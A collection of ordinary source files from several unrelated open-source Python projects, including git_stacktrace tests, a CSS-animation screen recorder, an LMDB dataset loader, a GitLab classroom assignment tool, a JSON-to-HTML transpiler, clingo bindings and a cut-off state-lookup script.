self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
```
#### File: git_stacktrace/tests/test_api.py
```python
import mock
from git_stacktrace.tests import base
from git_stacktrace import api
from git_stacktrace import git
class TestApi(base.TestCase):
@mock.patch('git_stacktrace.git.convert_since')
def test_convert_since(self, mocked_command):
expected = "HASH1..HASH2"
mocked_command.return_value = expected
self.assertEqual(expected, api.convert_since('1.day'))
@mock.patch('git_stacktrace.git.valid_range')
def test_valid_range(self, mocked_command):
expected = True
mocked_command.return_value = expected
self.assertEqual(expected, api.valid_range('hash1..hash2'))
expected = False
mocked_command.return_value = expected
self.assertEqual(expected, api.valid_range('hash1..hash2'))
def get_traceback(self, java=False):
if java:
with open('git_stacktrace/tests/examples/java1.trace') as f:
traceback = api.parse_trace(f.readlines())
else:
with open('git_stacktrace/tests/examples/python3.trace') as f:
traceback = api.parse_trace(f.readlines())
return traceback
def setup_mocks(self, mock_files, mock_files_touched):
mock_files_touched.return_value = {'hash2': [git.GitFile('common/utils/geo_utils.py', 'M')]}
mock_files.return_value = ['common/utils/geo_utils.py']
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_python(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
mock_line_match.return_value = False
traceback = self.get_traceback()
self.setup_mocks(mock_files, mock_files_touched)
self.assertEqual(0, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False).
get_sorted_results()[0]._line_numbers_matched)
self.assertEqual(3, mock_pickaxe.call_count)
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_java(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
mock_line_match.return_value = True
traceback = self.get_traceback(java=True)
mock_files.return_value = ['devdaily/src/main/java/com/devdaily/tests/ExceptionTest.java']
mock_files_touched.return_value = {
'hash2':
[git.GitFile('devdaily/src/main/java/com/devdaily/tests/ExceptionTest.java', 'M')]}
self.assertEqual(2, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False).
get_sorted_results()[0]._line_numbers_matched)
self.assertEqual(0, mock_pickaxe.call_count)
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_fast(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
traceback = self.get_traceback()
self.setup_mocks(mock_files, mock_files_touched)
api.lookup_stacktrace(traceback, "hash1..hash3", fast=True)
self.assertEqual(1, mock_pickaxe.call_count)
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_line_match(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
mock_line_match.return_value = True
traceback = self.get_traceback()
self.setup_mocks(mock_files, mock_files_touched)
self.assertEqual(1, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False).
get_sorted_results()[0]._line_numbers_matched)
self.assertEqual(3, mock_pickaxe.call_count)
``` |
{
"source": "josherich/CSS2Code",
"score": 2
} |
#### File: CSS2Code/scripts/record.py
```python
from selenium import webdriver
import sys, getopt, time, subprocess, shlex
from xvfbwrapper import Xvfb
import argparse
effects = ['bounce','flash', 'pulse', 'rubberBand',
'shake', 'headShake', 'swing', 'tada',
'wobble','jello', 'bounceIn','bounceInDown',
'bounceInLeft','bounceInRight', 'bounceInUp','bounceOut',
'bounceOutDown', 'bounceOutLeft', 'bounceOutRight','bounceOutUp',
'fadeIn','fadeInDown','fadeInDownBig', 'fadeInLeft',
'fadeInLeftBig', 'fadeInRight', 'fadeInRightBig','fadeInUp',
'fadeInUpBig', 'fadeOut', 'fadeOutDown', 'fadeOutDownBig',
'fadeOutLeft', 'fadeOutLeftBig','fadeOutRight','fadeOutRightBig',
'fadeOutUp', 'fadeOutUpBig','flipInX', 'flipInY',
'flipOutX','flipOutY','lightSpeedIn','lightSpeedOut',
'rotateIn','rotateInDownLeft','rotateInDownRight', 'rotateInUpLeft',
'rotateInUpRight', 'rotateOut', 'rotateOutDownLeft', 'rotateOutDownRight',
'rotateOutUpLeft', 'rotateOutUpRight','hinge', 'jackInTheBox',
'rollIn','rollOut', 'zoomIn','zoomInDown',
'zoomInLeft','zoomInRight', 'zoomInUp','zoomOut',
'zoomOutDown', 'zoomOutLeft', 'zoomOutRight','zoomOutUp',
'slideInDown', 'slideInLeft', 'slideInRight','slideInUp',
'slideOutDown','slideOutLeft','slideOutRight', 'slideOutUp',
'heartBeat']
patterns = [
'text',
'square',
'line',
'image'
]
speeds = [
'slow',
'slower',
'fast',
'faster'
]
def record(xvfb, browser, effect, pattern, speed, html_path, video_path):
url = 'file://%s/%s_%s_%s.html' % (html_path, effect, pattern, speed)
destination = '%s/%s/%s_%s_%s.flv' % (video_path, effect, effect, pattern, speed)
browser.get(url)
# normal quality, lagging in the first part on the video. filesize ~7MB
# ffmpeg_stream = 'ffmpeg -f x11grab -s 1280x720 -r 24 -i :%d+nomouse -c:v libx264 -preset superfast -pix_fmt yuv420p -s 1280x720 -threads 0 -f flv "%s"' % (xvfb.new_display, destination)
# high quality, no lagging but huge. file size ~50MB
# ffmpeg_stream = 'ffmpeg -y -r 30 -f x11grab -s 256x256 -i :%d+nomouse -c:v libx264 -pix_fmt yuv420p video/bounce_text.mp4' % xvfb.new_display
# mkdir
mkdir_cmd = 'mkdir %s/%s' % (video_path, effect)
p = subprocess.Popen(shlex.split(mkdir_cmd))
# crop
ffmpeg_stream = 'ffmpeg -y -f x11grab -s 256x512 -r 24 -t 5 -i :%d+nomouse -filter:v "crop=256:256:0:128" -c:v libx264 -preset superfast -pix_fmt yuv420p -f flv "%s"' % (xvfb.new_display, destination)
args = shlex.split(ffmpeg_stream)
p = subprocess.Popen(args)
time.sleep(6) # record for 6 secs
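# Illustrative call (hypothetical paths, added for clarity): for example,
# record(xvfb, browser, 'bounce', 'text', 'slow', '/data/html', '/data/video')
# loads file:///data/html/bounce_text_slow.html and captures about five
# seconds of it (24 fps, cropped to 256x256) into
# /data/video/bounce/bounce_text_slow.flv.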
def run(opt):
print('Sreencast webpage animation')
xvfb = Xvfb(width=256, height=512, colordepth=24)
xvfb.start()
browser = webdriver.Chrome()
for effect in effects:
for pattern in patterns:
for speed in speeds:
record(xvfb, browser, effect, pattern, speed, opt.html_path, opt.video_path)
browser.quit()
xvfb.stop()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
'--video-path',
default='./data/video',
type=str,
help='Root directory path of video generated')
parser.add_argument(
'--html-path',
default='./data/html',
type=str,
help='Root directory path of html generated')
args = parser.parse_args()
run(args)
``` |
{
"source": "joshes/ocp",
"score": 2
} |
#### File: ocpmodels/datasets/single_point_lmdb.py
```python
import os
import pickle
import lmdb
from torch.utils.data import Dataset
from ocpmodels.common.registry import registry
@registry.register_dataset("single_point_lmdb")
class SinglePointLmdbDataset(Dataset):
r"""Dataset class to load from LMDB files containing single point computations.
Useful for Initial Structure to Relaxed Energy (IS2RE) task.
Args:
config (dict): Dataset configuration
transform (callable, optional): Data transform function.
(default: :obj:`None`)
"""
def __init__(self, config, transform=None):
super(SinglePointLmdbDataset, self).__init__()
self.config = config
self.db_path = self.config["src"]
assert os.path.isfile(self.db_path), "{} not found".format(
self.db_path
)
env = self.connect_db(self.db_path)
self._keys = [
f"{j}".encode("ascii") for j in range(env.stat()["entries"])
]
self.transform = transform
env.close()
def __len__(self):
return len(self._keys)
def __getitem__(self, idx):
# Return features.
env = self.connect_db(self.db_path)
datapoint_pickled = env.begin().get(self._keys[idx])
data_object = pickle.loads(datapoint_pickled)
data_object = (
data_object
if self.transform is None
else self.transform(data_object)
)
env.close()
return data_object
def connect_db(self, lmdb_path=None):
env = lmdb.open(
lmdb_path,
subdir=False,
readonly=True,
lock=False,
readahead=False,
map_size=1099511627776 * 2,
)
return env
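# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original file): per the docstring and
# __init__ above, `config` is a plain dict whose "src" entry points at one
# LMDB file. The path below is purely hypothetical.
#
# dataset = SinglePointLmdbDataset({"src": "data/is2re/train/data.lmdb"})
# print(len(dataset))   # number of entries stored in the LMDB
# sample = dataset[0]   # unpickled data object for the first entry
# ---------------------------------------------------------------------------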
``` |
{
"source": "joshessman/assigner",
"score": 3
} |
#### File: assigner/commands/init.py
```python
import logging
import datetime
from assigner.config import requires_config
from assigner.backends.gitlab import GitlabRepo
help = "Interactively initialize a new configuration"
logger = logging.getLogger(__name__)
def prompt(explanation, default=None):
prompt_string = ""
if default is not None:
prompt_string = "{} (default: {}): ".format(explanation, default)
else:
prompt_string = "{}: ".format(explanation)
value = input(prompt_string)
if value == "":
if default is not None:
return default
return prompt(explanation, default)
return value
def guess_semester():
now = datetime.datetime.now()
if now.month < 5:
semester = "SP"
elif now.month < 8:
semester = "SS"
else:
semester = "FS"
return "{}-{}".format(now.year, semester)
@requires_config
def init(conf, _):
conf["version"] = 3
conf["backend"] = {"name": "gitlab"}
conf["backend"]["host"] = "https://{}".format(
prompt("Gitlab server to use", "gitlab.com")
)
conf["backend"]["token"] = prompt(
"Gitlab access token (from {}/profile/personal_access_tokens)".format(
conf["backend"]["host"]
)
)
conf["semester"] = prompt(
"Year and semester, in the format YYYY-(FS|SP|SS)", guess_semester()
)
conf["namespace"] = prompt(
"Gitlab group to create repositories under",
"{}-CS1001".format(conf["semester"]),
)
do_create_group = input("Do you want to create this group on Gitlab? [y/N]: ")
if do_create_group.lower() == "y":
GitlabRepo.create_group(conf["namespace"], conf["backend"])
print("{} created!".format(conf["namespace"]))
do_canvas = input("Do you want to configure Canvas integration? [y/N]: ")
if do_canvas.lower() == "y":
conf["canvas-host"] = prompt("Canvas server to use (???.instructure.com)")
conf["canvas-token"] = prompt(
"Canvas access token (from {}/profile/settings)".format(conf["canvas-host"])
)
print("Congratulations, you're ready to go!")
def setup_parser(parser):
parser.set_defaults(run=init)
```
#### File: assigner/commands/lock.py
```python
import logging
from assigner import manage_repos
from assigner.backends.exceptions import (
UserInAssignerGroup,
UserNotAssigned,
)
help = "Lock students out of repos"
logger = logging.getLogger(__name__)
def lock(args):
"""Sets each student to Reporter status on their homework repository so
they cannot push changes, etc.
"""
#pylint: disable=no-value-for-parameter
return manage_repos(args, _lock)
def _lock(repo, student):
try:
repo.lock(student["id"])
return True
except UserInAssignerGroup:
logging.info("%s cannot be locked out because they are a member of the group, skipping...", student["username"])
return False
except UserNotAssigned:
logging.info("%s has not been assigned for %s", repo.name, student["username"])
return False
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to lock.")
parser.add_argument("--section", nargs="?",
help="Section to lock")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment needs locking.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=lock)
```
#### File: assigner/commands/set.py
```python
import logging
from assigner.config import requires_config
help = "Set configuration values"
logger = logging.getLogger(__name__)
@requires_config
def set_conf(conf, args):
"""Sets <key> to <value> in the config.
"""
conf[args.key] = args.value
def setup_parser(parser):
parser.add_argument("key", help="Key to set")
parser.add_argument("value", help="Value to set")
parser.set_defaults(run=set_conf)
```
#### File: assigner/commands/unarchive.py
```python
import logging
from assigner import manage_repos
help = "Unarchive repos"
logger = logging.getLogger(__name__)
def unarchive(args):
"""Unarchive each student repository so it will show back up in the project list.
"""
#pylint: disable=no-value-for-parameter
return manage_repos(args, lambda repo, _: repo.unarchive())
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to unarchive.")
parser.add_argument("--section", nargs="?",
help="Section to unarchive")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment to unarchive.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=unarchive)
```
#### File: assigner/commands/unprotect.py
```python
import logging
from assigner import manage_repos
help = "Unprotect a repo branch"
logger = logging.getLogger(__name__)
def unprotect(args):
"""Unprotect a branch in each student's repository so they can force push to it."""
for branch in args.branch:
logging.info("Unprotecting %s...", branch)
#pylint: disable=no-value-for-parameter, cell-var-from-loop
manage_repos(args, lambda repo, _: repo.unprotect(branch))
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to unprotect.")
parser.add_argument("--branch", "--branches", nargs="+", default=["master"],
help="Branch to unprotect.")
parser.add_argument("--section", nargs="?",
help="Section to unprotect")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment to unprotect.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=unprotect)
```
#### File: assigner/config/versions.py
```python
import jsonschema
import logging
from assigner.config.schemas import SCHEMAS
from assigner.config.upgrades import UPGRADES
logger = logging.getLogger(__name__)
class ValidationError(jsonschema.ValidationError):
pass
class VersionError(Exception):
pass
class UpgradeError(Exception):
pass
def validate(config, version=None):
if version is None:
version = get_version(config)
if version >= len(SCHEMAS):
raise VersionError(
"Configuration version %d is newer than latest known configuration version %d" % (version, len(SCHEMAS) - 1)
)
try:
jsonschema.validate(config, SCHEMAS[version])
except jsonschema.ValidationError as e:
raise ValidationError(e)
def get_version(config):
if "version" not in config:
# Pre-version tracking
if "token" in config:
return 0
return 1
return config["version"]
def upgrade(config):
current = get_version(config)
latest = len(SCHEMAS) - 1
if current > latest:
return config
if current != latest:
logger.info("Migrating configuration from version %d to version %d.", current, latest)
# Determine whether we should look for upgrade-caused
# validation errors. If the initial config doesn't validate,
# we can't tell whether upgrading has made things worse, but
# we'll try anyway.
try:
validate(config, current)
is_valid = True
except ValidationError:
is_valid = False
for version in range(current, latest):
config = UPGRADES[version](config)
# Upgrade validation.
# Upgrades should be rare, so we can afford to be very particular about them.
assert get_version(config) == version + 1
if is_valid:
try:
validate(config, version + 1)
except ValidationError as e:
# pylint: disable=bad-continuation
raise UpgradeError(
"""
Upgrading configuration from version %d to %d resulted in an invalid configuration:
%s
This is a bug. Please file an issue at https://github.com/redkyn/assigner/issues with your configuration.
Your original configuration has been restored.
""" % (version, version + 1, e.message)
)
return config
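# ---------------------------------------------------------------------------
# Sketch of the intended call pattern (an assumption based on the code above,
# not taken from the original file):
#
# config = ...              # dict loaded from the user's configuration file
# config = upgrade(config)  # applies UPGRADES[current..latest-1] in order
# validate(config)          # raises ValidationError if the result is malformed
# ---------------------------------------------------------------------------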
```
#### File: assigner/assigner/progress.py
```python
import enlighten
# prevent name shadowing
__enumerate = enumerate
def iterate(iterable):
return Progress(iterable)
def enumerate(iterable):
return __enumerate(iterate(iterable))
class Progress:
def __init__(self, iterable):
try:
total = len(iterable)
except (TypeError, AttributeError):
total = None
self.iterable = iterable
self.manager = enlighten.get_manager()
self.pbar = self.manager.counter(total=total)
def __iter__(self):
for item in self.iterable:
yield item
self.pbar.update()
self.manager.stop()
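# ---------------------------------------------------------------------------
# Minimal usage sketch (added for illustration, not in the original module):
# both helpers wrap an iterable so an enlighten progress bar advances once per
# item while the caller loops as usual.
#
# for student in iterate(roster):
#     ...                                   # bar ticks after each student
#
# for index, student in enumerate(roster):  # this module's enumerate
#     ...
# ---------------------------------------------------------------------------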
```
#### File: assigner/assigner/roster_util.py
```python
from assigner.backends.base import RepoError
from assigner.config import DuplicateUserError
import logging
logger = logging.getLogger(__name__)
def get_filtered_roster(roster, section, target):
if target:
roster = [s for s in roster if s["username"] == target]
elif section:
roster = [s for s in roster if s["section"] == section]
if not roster:
raise ValueError("No matching students found in roster.")
return roster
def add_to_roster(
conf, backend, roster, name, username, section, force=False, canvas_id=None
):
student = {
"name": name,
"username": username,
"section": section,
}
logger.debug("%s", roster)
if not force and any(filter(lambda s: s["username"] == username, roster)):
raise DuplicateUserError("Student already exists in roster!")
try:
student["id"] = backend.repo.get_user_id(username, conf.backend)
except RepoError:
logger.warning("Student %s does not have a Gitlab account.", name)
if canvas_id:
student["canvas-id"] = canvas_id
roster.append(student)
```
#### File: assigner/tests/assigner_test.py
```python
import itertools
from unittest.mock import patch
from assigner import main, make_parser, subcommands
from assigner.tests.utils import AssignerTestCase
from git.cmd import GitCommandNotFound
class MakeParserTestCase(AssignerTestCase):
def setUp(self):
self.mock_argparse = self._create_patch(
"assigner.argparse", autospec=True
)
self.mock_parser = self.mock_argparse.ArgumentParser.return_value
self.mock_subparser = self.mock_parser.add_subparsers.return_value
def test_creates_argument_parser(self):
"""
make_parser should create an ArgumentParser when called.
"""
make_parser()
self.assertTrue(self.mock_argparse.ArgumentParser.called)
def test_adds_all_subcommands(self):
"""
        make_parser should add all subcommands when called.
"""
make_parser()
flattened_calls = list(itertools.chain(*itertools.chain(
*self.mock_subparser.add_parser.call_args_list
)))
for command in subcommands:
self.assertIn(command, flattened_calls)
def test_add_default_help(self):
"""
        make_parser should add a default to print usage when called.
"""
make_parser()
# NOTE: You can't compare lambdas made in different scopes
self.assertTrue(self.mock_parser.set_defaults.called)
self.assertFalse(self.mock_parser.print_usage.called)
mock_args = self.mock_parser.parse_args.return_value
mock_args.version = False
_, kwargs = self.mock_parser.set_defaults.call_args
kwargs['run'](mock_args)
self.assertTrue(self.mock_parser.print_usage.called)
class ExampleError(Exception):
pass
class MainTestCase(AssignerTestCase):
def setUp(self):
self.mock_configure = self._create_patch(
"assigner.configure_logging", autospec=True
)
self.mock_make_parser = self._create_patch(
"assigner.make_parser", autospec=True
)
self.mock_parser = self.mock_make_parser.return_value
self.mock_args = self.mock_parser.parse_args.return_value
self.mock_logging = self._create_patch(
"assigner.logging", autospec=True
)
def test_calls_make_parser(self):
"""
main calls parse_args on make_parser's returned parser.
"""
main([])
self.assertTrue(self.mock_parser.parse_args.called)
def test_calls_args_run(self):
"""
main calls args.run with args.
"""
main([])
self.mock_args.run.assert_called_once_with(self.mock_args)
def test_main_catches_exceptions(self):
"""
main should catch any exceptions and raise SystemExit.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = Exception
with self.assertRaises(SystemExit):
main([])
def test_main_raises_exceptions_with_traceback(self):
"""
main should raise exceptions if traceback is True.
"""
self.mock_args.tracebacks = True
self.mock_args.run.side_effect = ExampleError
with self.assertRaises(ExampleError):
main([])
@patch("assigner.logger", autospec=True)
def test_main_logs_exceptions(self, mock_logger):
"""
main should log exceptions when raised.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = ExampleError
try:
main([])
except SystemExit:
pass
mock_logger.error.assert_called_once_with(str(ExampleError()))
@patch("assigner.logger", autospec=True)
def test_main_logs_keyerror_with_catch(self, mock_logger):
"""
main should log a KeyError with "is missing" when raised.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = KeyError()
try:
main([])
except SystemExit:
pass
mock_logger.error.assert_called_once_with(
"%s is missing", self.mock_args.run.side_effect
)
@patch("assigner.logger", autospec=True)
def test_main_logs_gitcommandnotfound_with_catch(self, mock_logger):
"""
main should log a GitCommandNotFound with "git is not installed!" when raised.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = GitCommandNotFound("git", "not installed!")
try:
main([])
except SystemExit:
pass
mock_logger.error.assert_called_once_with(
"git is not installed!"
)
def test_main_sets_verbosity(self):
"""
        main should set verbosity and level from args.
"""
main([])
mock_logger = self.mock_logging.getLogger.return_value
mock_logger.setLevel.assert_any_call(
self.mock_args.verbosity
)
``` |
{
"source": "joshessman-llnl/clingo",
"score": 3
} |
#### File: libpyclingo/clingo/core.py
```python
from typing import Callable, Tuple
from enum import Enum
from ._internal import _cb_error_panic, _ffi, _lib, _to_str
__all__ = [ 'Logger', 'MessageCode', 'TruthValue', 'version' ]
def version() -> Tuple[int, int, int]:
'''
Clingo's version as a tuple `(major, minor, revision)`.
'''
p_major = _ffi.new('int*')
p_minor = _ffi.new('int*')
p_revision = _ffi.new('int*')
_lib.clingo_version(p_major, p_minor, p_revision)
return p_major[0], p_minor[0], p_revision[0]
class MessageCode(Enum):
'''
Enumeration of messages codes.
'''
AtomUndefined = _lib.clingo_warning_atom_undefined
'''
Informs about an undefined atom in program.
'''
FileIncluded = _lib.clingo_warning_file_included
'''
Indicates that the same file was included multiple times.
'''
GlobalVariable = _lib.clingo_warning_global_variable
'''
Informs about a global variable in a tuple of an aggregate element.
'''
OperationUndefined = _lib.clingo_warning_operation_undefined
'''
Inform about an undefined arithmetic operation or unsupported weight of an
aggregate.
'''
    Other = _lib.clingo_warning_other
'''
Reports other kinds of messages.
'''
RuntimeError = _lib.clingo_warning_runtime_error
'''
To report multiple errors; a corresponding runtime error is raised later.
'''
VariableUnbounded = _lib.clingo_warning_variable_unbounded
'''
Informs about a CSP variable with an unbounded domain.
'''
Logger = Callable[[MessageCode, str], None]
@_ffi.def_extern(onerror=_cb_error_panic, name='pyclingo_logger_callback')
def _pyclingo_logger_callback(code, message, data):
'''
Low-level logger callback.
'''
handler = _ffi.from_handle(data)
handler(MessageCode(code), _to_str(message))
class TruthValue(Enum):
'''
Enumeration of the different truth values.
'''
False_ = _lib.clingo_external_type_false
'''
    Represents truth value false.
'''
Free = _lib.clingo_external_type_free
'''
Represents absence of a truth value.
'''
True_ = _lib.clingo_external_type_true
'''
Represents truth value true.
'''
Release = _lib.clingo_external_type_release
'''
Indicates that an atom is to be released.
'''
```
#### File: clingo/tests/test_conf.py
```python
from unittest import TestCase
from clingo import Configuration, Control
class TestConfig(TestCase):
'''
Tests for configuration and statistics.
'''
def test_config(self):
'''
Test configuration.
'''
ctl = Control(['-t', '2'])
self.assertIn('solver', ctl.configuration.keys)
self.assertEqual(len(ctl.configuration.solver), 2)
self.assertIsInstance(ctl.configuration.solver[0], Configuration)
self.assertIsInstance(ctl.configuration.solver[0].heuristic, str)
self.assertIsInstance(ctl.configuration.solver[0].description('heuristic'), str)
ctl.configuration.solver[0].heuristic = 'berkmin'
self.assertTrue(ctl.configuration.solver[0].heuristic.startswith('berkmin'))
def test_simple_stats(self):
'''
Test simple statistics.
'''
ctl = Control(['-t', '2', '--stats=2'])
ctl.add('base', [], '1 { a; b }.')
ctl.ground([('base', [])])
ctl.solve()
stats = ctl.statistics
self.assertGreaterEqual(stats['problem']['lp']['atoms'], 2)
self.assertGreaterEqual(stats['solving']['solvers']['choices'], 1)
def test_user_stats(self):
'''
Test user statistics.
'''
def on_statistics(step, accu):
step['test'] = {'a': 0, 'b': [1, 2], 'c': {'d': 3}}
accu['test'] = step['test']
step['test'] = {'a': lambda a: a+1,
'e': lambda a: 4 if a is None else 0,
'b': [-1, 2, 3]}
self.assertEqual(len(step['test']), 4)
self.assertEqual(len(step['test']['b']), 3)
self.assertEqual(len(step['test']['c']), 1)
self.assertIn('a', step['test'])
self.assertEqual(sorted(step['test']), ['a', 'b', 'c', 'e'])
self.assertEqual(sorted(step['test'].keys()), ['a', 'b', 'c', 'e'])
self.assertEqual(sorted(step['test']['c'].items()), [('d', 3.0)])
self.assertEqual(sorted(step['test']['c'].values()), [3.0])
step['test']['b'][1] = 99
self.assertEqual(step['test']['b'][1], 99)
step['test']['b'].extend([3, 4])
step['test']['b'] += [3, 4]
ctl = Control(['-t', '2', '--stats=2'])
ctl.add('base', [], '1 { a; b }.')
ctl.ground([('base', [])])
ctl.solve(on_statistics=on_statistics)
stats = ctl.statistics
self.assertEqual(stats['user_step']['test'], {'a': 1.0,
'b': [-1.0, 99.0, 3.0, 3.0, 4.0, 3.0, 4.0],
'c': {'d': 3.0},
'e': 4.0})
self.assertEqual(stats['user_accu']['test'], {'a': 0, 'b': [1, 2], 'c': {'d': 3}})
``` |
{
"source": "joshf26/JSML",
"score": 3
} |
#### File: JSML/src/inputparser.py
```python
import json
from sys import stdout
from argparse import ArgumentParser, FileType
def parse_input(default_output_filename='index.html'):
argument_parser = ArgumentParser()
argument_parser.add_argument(
'input',
type=FileType('r'),
help='specify the input json file name',
)
argument_parser.add_argument(
'-o',
'--output',
type=FileType('w'),
help='specify the output html file name (default is "index.html")',
)
argument_parser.add_argument(
'-p',
'--print',
action='store_true',
help='print to stdout and skip writing to file',
)
args = argument_parser.parse_args()
data = json.load(args.input)
if args.print:
output_file = stdout
elif args.output is not None:
output_file = args.output
else:
output_file = open(default_output_filename, 'w')
return (
data,
output_file,
)
```
#### File: JSML/src/main.py
```python
from inputparser import parse_input
from transpile import transpile
def main():
data, output_file = parse_input()
html = transpile(data)
output_file.write(html)
if __name__ == '__main__':
main()
```
#### File: JSML/src/transpile.py
```python
from xml.etree.ElementTree import Element, tostring, ElementTree
DOCTYPE_HEADER = '<!DOCTYPE html>'
class JSMLError(Exception):
pass
def get_path(root, element):
parent_map = {child: parent for parent in ElementTree(root).iter() for child in parent}
path = [root]
current_element = element
while current_element is not root:
path.insert(1, current_element)
current_element = parent_map[current_element]
return path
def _check_type(data, key, value_type, root, parent, tag=None):
if key in data and not isinstance(data[key], value_type):
if parent is None:
raise JSMLError('Top level element\'s "{}" key must be a {} (not {}).'.format(
key,
value_type.__name__,
type(data[key]).__name__,
))
else:
raise JSMLError('Element with path "{} -> {}"\'s "{}" key must be a {} (not {}).'.format(
' -> '.join(element.tag for element in get_path(root, parent)),
tag if tag is not None else '?',
key,
value_type.__name__,
type(data[key]).__name__,
))
def transpile(data):
root = None
queue = [(data, None)]
while queue:
element_data, parent = queue.pop()
if isinstance(element_data, dict):
# Every element must have a "tag" key.
if 'tag' not in element_data:
if parent is None:
raise JSMLError('Top level element is missing "tag" key.')
else:
raise JSMLError('Element with path "{} -> ?" is missing "tag" key.'.format(
' -> '.join(element.tag for element in get_path(root, parent)),
))
# The "tag" key must be a string.
_check_type(element_data, 'tag', str, root, parent)
# The "attributes" key must be a dict.
_check_type(element_data, 'attributes', dict, root, parent, element_data['tag'])
# The "children" key must be a list.
_check_type(element_data, 'children', list, root, parent, element_data['tag'])
# Create the new element.
element = Element(
element_data['tag'],
element_data['attributes'] if 'attributes' in element_data else {},
)
# Append the element to its parent.
if parent is None:
root = element
else:
parent.append(element)
# Process the element's children.
if 'children' in element_data:
for child in element_data['children'][::-1]:
queue.append((child, element))
elif isinstance(element_data, str):
if parent is None:
# Edge case where entire document is only a string value.
return DOCTYPE_HEADER + element_data
else:
parent.text = element_data
else:
if parent is None:
raise JSMLError('Top level element is of invalid data type {}.'.format(
type(element_data).__name__,
))
else:
raise JSMLError('Element with path "{} -> ?" is of invalid data type {}.'.format(
' -> '.join(element.tag for element in get_path(root, parent)),
type(element_data).__name__,
))
return DOCTYPE_HEADER + tostring(root, encoding='unicode', method='html')
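# Hedged demo (added for illustration; not part of the original module). It
# exercises transpile() with the dict shape validated above: a "tag" string
# plus optional "attributes" dict and "children" list of dicts or strings.
if __name__ == '__main__':
    demo = {
        'tag': 'p',
        'attributes': {'class': 'greeting'},
        'children': ['Hello, world!'],
    }
    # Prints: <!DOCTYPE html><p class="greeting">Hello, world!</p>
    print(transpile(demo))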
``` |
{
"source": "joshfgohunt/Capstone",
"score": 3
} |
#### File: joshfgohunt/Capstone/Transform_Data.py
```python
import pandas as pd
########### Add State Info ################
def add_state_abbrev(df, left):
us_state_abbrev = {
'Alabama': 'AL', 'Alaska': 'AK', 'Arizona': 'AZ', 'Arkansas': 'AR', 'California': 'CA', 'Colorado': 'CO',
'Connecticut': 'CT', 'Delaware': 'DE', 'Florida': 'FL', 'Georgia': 'GA', 'Hawaii': 'HI', 'Idaho': 'ID',
'Illinois': 'IL', 'Indiana': 'IN', 'Iowa': 'IA', 'Kansas': 'KS', 'Kentucky': 'KY', 'Louisiana': 'LA',
'Maine': 'ME', 'Maryland': 'MD', 'Massachusetts': 'MA', 'Michigan': 'MI', 'Minnesota': 'MN', 'Mississippi': 'MS',
'Missouri': 'MO', 'Montana': 'MT', 'Nebraska': 'NE', 'Nevada': 'NV', 'New Hampshire': 'NH', 'New Jersey': 'NJ',
'New Mexico': 'NM', 'New York': 'NY', 'North Carolina': 'NC', 'North Dakota': 'ND', 'Ohio': 'OH', 'Oklahoma': 'OK',
'Oregon': 'OR', 'Pennsylvania': 'PA', 'Rhode Island': 'RI', 'South Carolina': 'SC', 'South Dakota': 'SD',
'Tennessee': 'TN', 'Texas': 'TX', 'Utah': 'UT', 'Vermont': 'VT', 'Virginia': 'VA', 'Washington': 'WA',
'West Virginia': 'WV', 'Wisconsin': 'WI', 'Wyoming': 'WY', 'District of Columbia' : 'DC'}
us_abbr = pd.DataFrame.from_dict(us_state_abbrev, orient='index')
us_abbr = us_abbr.reset_index()
us_abbr.columns = ['State', 'Abbr']
right = 'State'
df = df.merge(us_abbr, how='inner', left_on=left, right_on=right)
return df
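# Usage sketch (illustrative only, not from the original file): given a frame
# with a column of full state names, e.g. df['state_name'] = ['Missouri', ...],
# add_state_abbrev(df, 'state_name') inner-joins the lookup table and appends
# 'State' and 'Abbr' columns ('Missouri' -> 'MO').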
def add_state_region(df, left):
state_region = {'Alabama': 'Southern', 'Alaska': 'Western', 'Arizona': 'Western', 'Arkansas': 'Southern', 'California': 'Western', 'Colorado': 'Western',
'Connecticut': 'Northeastern', 'Delaware': 'Southern', 'Florida': 'Southern', 'Georgia': 'Southern', 'Hawaii': 'Western', 'Idaho': 'Western',
'Illinois': 'Midwestern', 'Indiana': 'Midwestern', 'Iowa': 'Midwestern', 'Kansas': 'Midwestern', 'Kentucky': 'Southern', 'Louisiana': 'Southern',
'Maine': 'Northeastern', 'Maryland': 'Southern', 'Massachusetts': 'Northeastern', 'Michigan': 'Midwestern', 'Minnesota': 'Midwestern', 'Mississippi': 'Southern',
